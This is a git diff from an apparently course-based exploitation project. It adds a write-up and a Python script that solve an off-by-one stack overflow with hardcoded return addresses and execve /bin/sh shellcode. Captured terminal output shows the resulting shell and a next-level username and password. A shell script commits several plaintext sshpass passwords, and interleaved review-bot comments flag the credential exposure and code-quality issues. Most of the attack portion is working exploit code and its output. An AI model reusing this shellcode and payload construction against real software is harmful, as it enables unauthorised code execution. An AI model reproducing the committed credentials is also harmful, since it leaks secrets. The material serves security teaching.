diff --git a/proj1/explain.md b/proj1/explain.md
index 373fd730c264f3d1c42e9776b2d8dfb291d24c0a..52cad479eeb2d05da164a0b663b5059dbb3719f4 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -149,3 +149,77 @@ b = binascii.unhexlify(payload) with open('/dev/fd/1','wb') as f: f.write(b) ``` + +## 3 + +The question is off-by-one overflow problem. After reading aslr.pdf figure 30, I know that I should set %ebp to &buf[0] (0xbffffa40), and put the new return address in &buf[1], and put the payload. So I should overflow an "40" to %ebp. Now I'll do it. + +However, after implementing the solution above, ./debug-exploit works but ./exploit doesn't. That's because overflowed "0x40" xor "1<<5" yields "`", which is beaking the shell (in the buggy exploit script). So I shift everything 4 bytes right. Now %ebp is set to &buf[1] and new return address is set to &buf[2] and overflowed byte is "44". Now everything is OK. + +``` +pwnable:~$ ./exploit +#Eg#EgL���j1X̀�É�jFX̀1�Ph//shh/binT[PS��1Ұ + +D���9���'�������]���'��� ���4��� +/home/brown $ cat README +Remember, all I'm offering is the truth. Nothing more. + +Next username: jz +Next password: cqkeuevfIO +``` + +My `./arg` is still attached below. Note that my `./egg` is empty. + +``` +#!/usr/bin/python3 + +def fuck8(txt): + assert(len(txt) == 8) + return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2] + +def revert(txt): + assert(len(txt) % 8 == 0) + res = "" + for i in range(int(len(txt) / 8)): + res += fuck8(txt[i*8:(i+1)*8]) + return res + +## The FUCKING silly script booms the shell because overflow="40"="`". 
+## cs161-atw +#raddr = "bffffa48" +##shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" +#shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a" +# +#overflow = "40" +#buf0 = "01234567" +# +#length_to_fill = 64 - 8 - int(len(shellcode)/2) +#fill = "01" * length_to_fill +# +#payload = buf0 + revert(raddr) + (shellcode) + fill + overflow + +## cs161-atw +raddr = "bffffa4c" +#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" +shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a" + +overflow = "44" +buf0 = "01234567" + +length_to_fill = 64 - 8 - 4 - int(len(shellcode)/2) +fill = "01" * length_to_fill + +payload = buf0 + buf0 + revert(raddr) + (shellcode) + fill + overflow + + +import binascii + +b = binascii.unhexlify(payload) +b = bytes([byte^(1<<5) for byte in b]) +with open('/dev/fd/1','wb') as f: + f.write(b) + +``` + + + diff --git a/proj1/solution/arg3 b/proj1/solution/arg3 new file mode 100755 index 0000000000000000000000000000000000000000..ba1d8b9e8435fd3373cd5e557289cb7b35c04d8b --- /dev/null +++ b/proj1/solution/arg3 
@@ -0,0 +1,49 @@ +#!/usr/bin/python3 + +def fuck8(txt): + assert(len(txt) == 8) + return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2] + +def revert(txt): + assert(len(txt) % 8 == 0) + res = "" + for i in range(int(len(txt) / 8)): + res += fuck8(txt[i*8:(i+1)*8]) + return res + +## The FUCKING silly script booms the shell because overflow="40"="`". +## cs161-atw +#raddr = "bffffa48" +##shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" +#shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a" +# +#overflow = "40" +#buf0 = "01234567" +# +#length_to_fill = 64 - 8 - int(len(shellcode)/2) +#fill = "01" * length_to_fill +# +#payload = buf0 + revert(raddr) + (shellcode) + fill + overflow + +## cs161-atw +raddr = "bffffa4c" +#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" +shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a" + +overflow = "44" +buf0 = "01234567" + +length_to_fill = 64 - 8 - 4 - int(len(shellcode)/2) +fill = "01" * length_to_fill + +payload = buf0 + buf0 + revert(raddr) + (shellcode) + fill + overflow + + +import binascii + +b = binascii.unhexlify(payload) +b = bytes([byte^(1<<5) for byte in b]) +with open('/dev/fd/1','wb') as f: + f.write(b) + + diff --git a/proj1/solution/egg3 b/proj1/solution/egg3 new file mode 100755 index 0000000000000000000000000000000000000000..13f47935d98bc44bbe5f7dafb745814aab2b8b79 --- /dev/null +++ b/proj1/solution/egg3 @@ -0,0 +1,2 @@ +#!/bin/sh + diff --git a/proj1/ssh.sh b/proj1/ssh.sh index 7588d59878cc0aee8820f194f088f06b99f6c7ee..cf5d074634db9ec39a965c989590b85bacaf9d20 100755 --- a/proj1/ssh.sh +++ b/proj1/ssh.sh 
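Review bot: In arg3 the `assert(...)` guards in `fuck8` and `revert` are stripped under `python3 -O`, so they do not protect the callers that depend on them; `if len(txt) != 8: raise ValueError("expected 8 hex digits")` keeps the check in every run, and `int(len(txt) / 8)` is more directly `len(txt) // 8`. Likewise `"01" * length_to_fill` silently yields an empty string when the computed length is negative, so a wrong length goes unnoticed; fail loudly with `if length_to_fill < 0: raise ValueError("payload too long")` before `fill` is built. Neither helper is documented: a one-line docstring saying that `fuck8` reverses the byte order of an 8-hex-digit word (presumably to emit the address little-endian, confirm) and that `revert` applies it per 8-character chunk would spare the next reader the name. The twenty-odd commented-out lines of the earlier attempt, including its shellcode, belong in git history rather than in the script; the same applies to the copy of this script embedded in the explain.md hunk above.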
@@ -6,5 +6,6 @@ if [[ $1 == remote ]]; then
 else
 echo 'Connecting localhost...'
 #sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no vsftpd@localhost -p 16161
- sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no smith@localhost -p 16161
+ #sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no smith@localhost -p 16161
+ sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no brown@localhost -p 16161
 fi
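Review bot: The added line commits another plaintext password through `sshpass -p` and keeps the superseded one as a commented-out line directly above it, so every credential this script has used is readable in the file and in repository history, and `-p` additionally exposes the value to any local user via the process list. Move the secret out of the script: `sshpass -e ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no brown@localhost -p 16161` with `SSHPASS` exported from the environment (or `-f` pointing at a file outside the repo), and delete the commented-out lines rather than accumulating them. Credentials already committed should be treated as exposed and rotated, since removing them from the working tree does not remove them from history; the explain.md hunk above records a further password in its captured terminal output. The `if` that encloses this `else` branch starts outside the hunk.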